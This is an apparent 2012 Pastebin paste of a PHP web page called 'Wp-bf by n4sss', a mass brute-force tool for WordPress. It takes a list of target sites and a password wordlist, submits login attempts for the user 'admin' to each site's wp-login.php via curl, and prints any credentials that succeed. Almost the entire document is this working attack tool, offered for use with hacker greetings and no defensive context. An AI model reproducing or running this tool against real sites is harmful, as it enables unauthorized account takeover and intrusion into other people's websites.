lehieuit

Wp-bf

Jun 2nd, 2012
182
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.25 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
  2. <html>
  3. <head>
  4. <title>Wp-bf
  5. by n4sss</title>
  6. </head>
  7. <body
  8.  style="background-image: url(http://www.freeimagehosting.net/newuploads/y14k7.jpg);">
  9. <center>
  10. <form method="post" action=""><span
  11.  style="font-weight: bold; font-family: monospace; color: rgb(255, 255, 255);">w00rdpr3ss
  12. Bf by n4sss</span><br
  13.  style="font-family: monospace; color: rgb(255, 255, 255);">
  14.   <span
  15.  style="font-style: italic; font-family: monospace; color: rgb(255, 255, 255);"
  16.  id="result_box" class="short_text" lang="en"><span
  17.  class="hps">make</span>
  18.   <span class="hps">simple,
  19. make</span> <span
  20.  class="hps">beautiful.</span></span><br>
  21.   <textarea name="wpress" cols="36"
  22.  rows="12"></textarea><br>
  23.   <span style="font-weight: bold;"><br>
  24.   <span
  25.  style="font-family: monospace; color: rgb(255, 255, 255);">Passwords
  26. : </span></span><br
  27.  style="color: rgb(255, 255, 255);">
  28.   <span
  29.  style="font-family: monospace; color: rgb(255, 255, 255);">e.g:
  30. word.txt</span><br>
  31.   <input value="word.txt"
  32.  name="password"><br>
  33.   <p><input
  34.  name="submit" value="Iniciar" type="submit">
  35.   </p>
  36. </form>
  37. </center>
  38. <?php /*
  39. wp Bf By n4sss.
  40. greetx : Status, chokoo, fl4m3, hackinho, anj0, shadow-ebr, xcholler.
  41. 2012
  42. */
  43. ob_start();
  44. error_reporting(0);
  45. set_time_limit(0);
  46. $listadesites=explode("\n",$_POST['wpress']);
  47. foreach($listadesites as $slist){
  48. $temiz=trim($slist);
  49. $site=$temiz;
  50. if(! $_POST['wpress']==""){
  51. $pass=htmlspecialchars($_POST['password']);
  52. foreach(file($pass)as $password){
  53. $curl = curl_init();
  54. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  55. curl_setopt($curl,CURLOPT_URL,$site.'/wp-login.php');
  56. curl_setopt($curl,CURLOPT_COOKIEJAR,"c00ki3.txt");
  57. curl_setopt($curl,CURLOPT_COOKIEFILE,"c00ki3.txt");
  58. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  59. curl_setopt($curl,CURLOPT_POST,TRUE); curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=$password&wp-submit=Log+In&redirect_to=.$site./wp-admin/&testcookie=1");
  60. $a = curl_exec($curl);
  61. if(eregi ("profile.php",$a)){
  62. echo '<center><big
  63. style="font-family: monospace; color: rgb(255, 255, 255);"><span
  64. style="font-weight: bold;">
  65. '.$site.' SUCESSO: admin:'.$password.'</center></span></big>';
  66. ob_flush();
  67. flush();
  68. }
  69. }
  70. }
  71. }
  72.  
  73. //#EOF_
  74. ?>
  75. </body>
  76. </html>
Advertisement
Add Comment
Please, Sign In to add comment